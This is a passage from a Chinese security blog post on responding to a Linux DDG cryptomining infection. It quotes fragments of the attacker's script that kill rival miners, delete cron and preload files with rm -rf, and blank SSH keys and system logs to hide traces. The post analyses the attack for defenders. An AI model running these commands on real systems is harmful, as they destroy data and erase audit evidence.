class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"wnTKYg"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"t00ls.ru"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"sustes"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"thisxxs"</span> | awk <span class="string">'&#123;print $2&#125;'</span> | xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"hashfish"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div><div class="line"><span class="keyword">ps</span> auxf|<span class="keyword">grep</span> -v <span class="keyword">grep</span>|<span class="keyword">grep</span> <span class="string">"kworkerds"</span> | awk <span class="string">'&#123;print $2&#125;'</span>|xargs kill -<span class="number">9</span></div></pre></td></tr></table></figure>
<p>这是啥？这本来是攻击者为了让服务器资源都用在自己的挖矿进程上，关闭其他可能存在的挖矿及DDoS木马。</p>
<p>这TM真是良心啊！都不用整理了！以后遇到挖矿的事件拿出来一把梭！！！</p>
<figure class="highlight groovy"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">chattr -i <span class="regexp">/etc/</span>cron.d/root</div><div class="line">chattr -i <span class="regexp">/etc/</span>cron.d/system</div><div class="line">chattr -i <span class="regexp">/etc/</span>ld.so.preload</div><div class="line">chattr -i <span class="regexp">/etc/</span>cron.d/apache</div><div class="line">chattr -i <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>root</div><div class="line">chattr -i <span class="regexp">/var/</span>spool<span class="regexp">/cron/</span>crontabs/root</div><div class="line">chattr -i <span class="regexp">/usr/</span>local<span class="regexp">/bin/</span>dns</div><div class="line">chattr -i <span class="regexp">/usr/</span>sbin/netdns</div><div class="line">chattr -i <span class="regexp">/bin/</span>netstat</div><div class="line">rm -rf <span class="regexp">/etc/</span>cron.d<span class="regexp">/system /</span>etc<span class="regexp">/cron.d/</span>apache <span class="regexp">/etc/</span>cron.hourly<span class="regexp">/oanacron /</span>etc<span class="regexp">/cron.daily/</span>oanacron <span class="regexp">/etc/</span>cron.monthly<span class="regexp">/oanacron /</span>usr<span class="regexp">/local/</span>lib/libn</div><div class="line">tp.so <span class="regexp">/etc/</span>init.d<span class="regexp">/netdns /</span>etc<span class="regexp">/init.d/</span>kworker <span class="regexp">/bin/</span>httpdns <span class="regexp">/usr/</span>local<span class="regexp">/bin/</span>dns <span class="regexp">/bin/</span>netstat <span class="regexp">/usr/</span>sbin/netdns</div><div class="line">chkconfig --del kworker</div><div class="line">chkconfig --del netdns</div><div class="line">p=$(ps auxf|grep -v grep|grep ksoftirqds|wc -l)</div><div class="line"><span class="keyword">if</span> [ $&#123;p&#125; -eq <span class="number">0</span> ];then</div><div class="line">    ps auxf|grep -v grep | awk <span class="string">'&#123;if($3&gt;=80.0) print $2&#125;'</span>| xargs kill <span class="number">-9</span></div><div class="line">fi</div></pre></td></tr></table></figure>
<p>使用chattr解锁相关文件，并删除；清除CPU占用率超过百分之80的进程</p>
<figure class="highlight mel"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">if</span> [ -e <span class="string">"/tmp/gates.lod"</span> ]; then</div><div class="line">    rm -rf $(readlink /<span class="keyword">proc</span>/$(cat /tmp/gates.lod)/exe)</div><div class="line">    kill <span class="number">-9</span> $(cat /tmp/gates.lod)</div><div class="line">    rm -rf $(readlink /<span class="keyword">proc</span>/$(cat /tmp/moni.lod)/exe)</div><div class="line">    kill <span class="number">-9</span> $(cat /tmp/moni.lod)</div><div class="line">    rm -rf /tmp/&#123;gates,moni&#125;.lod</div><div class="line">fi</div></pre></td></tr></table></figure>
<p>清除billgates挖矿木马相关文件、进程。</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">echo</span> 0&gt;<span class="string">/root/.ssh/authorized_keys</span>   <span class="comment">#清除ssh密钥内容</span></div><div class="line"><span class="keyword">echo</span> 0&gt;<span class="string">/var/spool/mail/root</span>         <span class="comment">#清除邮件内容</span></div><div class="line"><span class="keyword">echo</span> 0&gt;<span class="string">/var/log/wtmp</span>                <span class="comment">#清除登录日志</span></div><div class="line"><span class="keyword">echo</span> 0&gt;<span class="string">/var/log/secure</span>              <span class="comment">#清除安全日志</span></div><div class="line"><span class="keyword">echo</span> 0&gt;<span class="string">/var/log/cron</span>                <span class="comment">#清除计划任务日志</span></div></pre></td></tr></table></figure>
<p><strong>总体来说此次挖矿的幕后操作者相当的良心，诚意满满！学到了！</strong></p>
<h4 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h4><p><a href="https://mp.weixin.qq.com/s?__biz=MzI4NjE2NjgxMQ==&amp;mid=2650236941&amp;idx=2&amp;sn=cd15e59cde2ed50ee8093def270acfe5&amp;chksm=f3e2d279c4955b6f935bf8129c2277d965f75bd1c5cdeece4e6dd81fc5d2a36292d52b86429c&amp;mpshare=1&amp;scene=23&amp;srcid=%23rd" target="_blank" rel="external">https://mp.weixin.qq.com/s?__biz=MzI4NjE2NjgxMQ==&amp;mid=2650236941&amp;idx=2&amp;sn=cd15e59cde2ed50ee8093def270acfe5&amp;chksm=f3e2d279c4955b6f935bf8129c2277d965f75bd1c5cdeece4e6dd81fc5d2a36292d52b86429c&amp;mpshare=1&amp;scene=23&amp;srcid=%23rd</a></p>
<p><a href="https://mp.weixin.qq.com/s/7HyO9gVdgDYL4x7DKCVgZA" target="_blank" rel="external">https://mp.weixin.qq.com/s/7HyO9gVdgDYL4x7DKCVgZA</a></p>
<p><a href="http://man.linuxde.net/ldconfig" target="_blank" rel="external">http://man.linuxde.net/ldconfig</a></p>
<p><a href="https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc" target="_blank" rel="external">https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc</a></p>
<p><a href="http://vulsee.com/archives/vulsee_2019/0220_7345.html" target="_blank" rel="external">http://vulsee.com/archives/vulsee_2019/0220_7345.html</a></p>
<p><a href="https://www.secpulse.com/archives/98372.html" target="_blank" rel="external">https://www.secpulse.com/archives/98372.html</a></p>
<p><a href="https://xz.aliyun.com/t/4136" target="_blank" rel="external">https://xz.aliyun.com/t/4136</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
    <div>大爷，赏个铜板呗！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/weixin.png" alt="瓦都剋 WeChat Pay"/>
          <p>微信打赏</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/zhifubao.png" alt="瓦都剋 Alipay"/>
          <p>支付宝打赏</p>
        </div>
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>本文作者：</strong>
      瓦都剋
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/" title="关于Linux下变种DDG挖矿应急处理总结">http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/</a>
    </li>
    <li class="post-copyright-license">
      <strong>版权声明： </strong>
      本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
    </li>
  </ul>


      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/linux/" rel="tag"><i class="fa fa-tag"></i> linux</a>
          
            <a href="/tags/应急响应/" rel="tag"><i class="fa fa-tag"></i> 应急响应</a>
          
            <a href="/tags/Redis/" rel="tag"><i class="fa fa-tag"></i> Redis</a>
          
            <a href="/tags/Jenkins/" rel="tag"><i class="fa fa-tag"></i> Jenkins</a>
          
            <a href="/tags/Nexus/" rel="tag"><i class="fa fa-tag"></i> Nexus</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/12/12/Django开发漏洞管理平台/" rel="next" title="Django开发漏洞管理平台">
                <i class="fa fa-chevron-left"></i> Django开发漏洞管理平台
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/09/Linux、Windows权限维持常用后门总结/" rel="prev" title="Linux、Windows权限维持常用后门学习总结：Linux篇">
                Linux、Windows权限维持常用后门学习总结：Linux篇 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript" >
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.png"
               alt="瓦都剋" />
          <p class="site-author-name" itemprop="name">瓦都剋</p>
           
              <p class="site-description motion-element" itemprop="description">Looking at yourself from a different Angle!</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">90</span>
                <span class="site-state-item-name">日志</span>
              </a>
            </div>
          

          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">79</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        
          <div class="feed-link motion-element">
            <a href="/atom.xml" rel="alternate">
              <i class="fa fa-rss"></i>
              RSS
            </a>
          </div>
        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/w2n1ck" target="_blank" title="Weibo">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Weibo
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="http://github.com/w2n1ck" target="_blank" title="Github">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Github
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="https://www.zhihu.com/people/w2n1ck/activities" target="_blank" title="Zhihu">
                  
                    <i class="fa fa-fw fa-heartbeat"></i>
                  
                  Zhihu
                </a>
              </span>
            
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              友情链接
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://wkh.dropsec.xyz" title="王小洪" target="_blank">王小洪</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://fgp.dropsec.xyz" title="冯小鹏" target="_blank">冯小鹏</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.neargle.com/" title="周小斌" target="_blank">周小斌</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://am4zing.me/" title="王小岩" target="_blank">王小岩</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://yangge.me/" title="杨大成" target="_blank">杨大成</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.secpulse.com/" title="安全脉搏" target="_blank">安全脉搏</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.dropsec.xyz/" title="团队主页" target="_blank">团队主页</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#背景"><span class="nav-number">1.</span> <span class="nav-text">背景</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-事件处理过程"><span class="nav-number">2.</span> <span class="nav-text">0x00 事件处理过程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-传播途径"><span class="nav-number">3.</span> <span class="nav-text">0x01 传播途径</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-处理流程"><span class="nav-number">4.</span> <span class="nav-text">0x02 处理流程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#获取busybox"><span class="nav-number">4.1.</span> <span class="nav-text">获取busybox</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#病毒文件"><span class="nav-number">4.2.</span> <span class="nav-text">病毒文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#关闭crontab"><span class="nav-number">4.3.</span> <span class="nav-text">关闭crontab</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改hosts"><span class="nav-number">4.4.</span> <span class="nav-text">修改hosts</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除，创建，并锁定-crontab相关文件"><span class="nav-number">4.5.</span> <span class="nav-text">删除，创建，并锁定 crontab相关文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#备份重要的crontab，然后删除cron-d目录的其他文件"><span class="nav-number">4.6.</span> <span class="nav-text">备份重要的crontab，然后删除cron.d目录的其他文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#检查并删除下面目录是否有异常文件"><span class="nav-number">4.7.</span> <span class="nav-text">检查并删除下面目录是否有异常文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除病毒相关执行文件和启动脚本"><span class="nav-number">4.8.</span> <span class="nav-text">删除病毒相关执行文件和启动脚本</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除病毒进程"><span class="nav-number">4.9.</span> <span class="nav-text">删除病毒进程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#删除被preload的so库"><span class="nav-number">4.10.</span> <span class="nav-text">删除被preload的so库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#验证libioset-so被卸载"><span class="nav-number">4.11.</span> <span class="nav-text">验证libioset.so被卸载</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#一键清理脚本"><span class="nav-number">4.12.</span> <span class="nav-text">一键清理脚本</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-事件总结"><span class="nav-number">5.</span> <span class="nav-text">0x03 事件总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#彩蛋"><span class="nav-number">5.0.1.</span> <span class="nav-text">彩蛋</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考文章"><span class="nav-number">5.0.2.</span> <span class="nav-text">参考文章</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy;  2015 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-linkedin"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">瓦都剋</span>
</div>



        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>

  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  

    
      <script id="dsq-count-scr" src="https://mydisqus-2.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://byd.dropsec.xyz/2019/02/22/关于Linux下变种DDG挖矿应急处理总结/';
          this.page.identifier = '2019/02/22/关于Linux下变种DDG挖矿应急处理总结/';
          this.page.title = '关于Linux下变种DDG挖矿应急处理总结';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://mydisqus-2.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  








  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (search_path.endsWith("json")) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  

<script type="text/javascript" color="0,0,0" opacity='0.7' zIndex="-2" count="20" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
</body>
</html>
